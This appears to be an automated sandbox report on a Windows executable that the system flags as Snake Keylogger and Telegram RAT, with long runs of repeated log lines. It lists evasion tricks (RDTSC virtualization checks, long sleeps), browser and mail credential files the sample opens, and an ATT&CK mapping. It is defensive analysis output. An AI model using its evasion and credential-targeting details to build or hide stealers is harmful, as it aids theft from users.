            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\OeM750ajqm.exeAPI/Special instruction interceptor: Address: 7D07734
            Source: C:\Users\user\Desktop\OeM750ajqm.exeAPI/Special instruction interceptor: Address: 4077734
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\OeM750ajqm.exeRDTSC instruction interceptor: First address: 7CC82A0 second address: 7CC82A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F03F0D3D81Ah 0x00000004 test dx, FCADh 0x00000009 cmp ebx, ecx 0x0000000b jc 00007F03F0D3D79Bh 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\OeM750ajqm.exeRDTSC instruction interceptor: First address: 40382A0 second address: 40382A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F03F1161BAAh 0x00000004 test dx, FCADh 0x00000009 cmp ebx, ecx 0x0000000b jc 00007F03F1161B2Bh 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\OeM750ajqm.exeMemory allocated: 6520000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeMemory allocated: 36C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeMemory allocated: 38C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599666Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598248Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597779Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597659Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597527Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597421Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597298Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597172Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595420Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595202Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595092Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594983Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594874Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594653Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594540Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeWindow / User API: threadDelayed 8273Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeWindow / User API: threadDelayed 1584Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst74DF.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\OeM750ajqm.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599889s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3576Thread sleep count: 8273 > 30Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3576Thread sleep count: 1584 > 30Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599666s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598248s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598031s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597779s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597659s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597527s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597421s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597298s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -597062s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596843s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596515s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595420s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595202s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -595092s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594983s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594874s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594653s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -594540s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00406751 FindFirstFileA,FindClose,3_2_00406751
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405B80
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_004027CF FindFirstFileA,3_2_004027CF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_00406751 FindFirstFileA,FindClose,4_2_00406751
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_004027CF FindFirstFileA,4_2_004027CF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_00405B80 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_00405B80
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599666Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598797Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598248Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597779Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597659Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597527Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597421Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597298Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597172Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 597062Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596953Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596843Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596625Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596515Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595968Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595420Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595202Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595092Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594983Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594874Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594653Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594540Jump to behavior
            Source: OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWf
            Source: OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\OeM750ajqm.exeAPI call chain: ExitProcess graph end nodegraph_3-4881
            Source: C:\Users\user\Desktop\OeM750ajqm.exeAPI call chain: ExitProcess graph end nodegraph_3-5048
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_6D6C1B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,3_2_6D6C1B28
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeProcess created: C:\Users\user\Desktop\OeM750ajqm.exe "C:\Users\user\Desktop\OeM750ajqm.exe"Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeQueries volume information: C:\Users\user\Desktop\OeM750ajqm.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 3_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004034F1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000004.00000002.2555642675.0000000036C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: OeM750ajqm.exe PID: 4940, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\OeM750ajqm.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: OeM750ajqm.exe PID: 4940, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000004.00000002.2555642675.0000000036C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000004.00000002.2555642675.0000000036D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: OeM750ajqm.exe PID: 4940, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		2
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
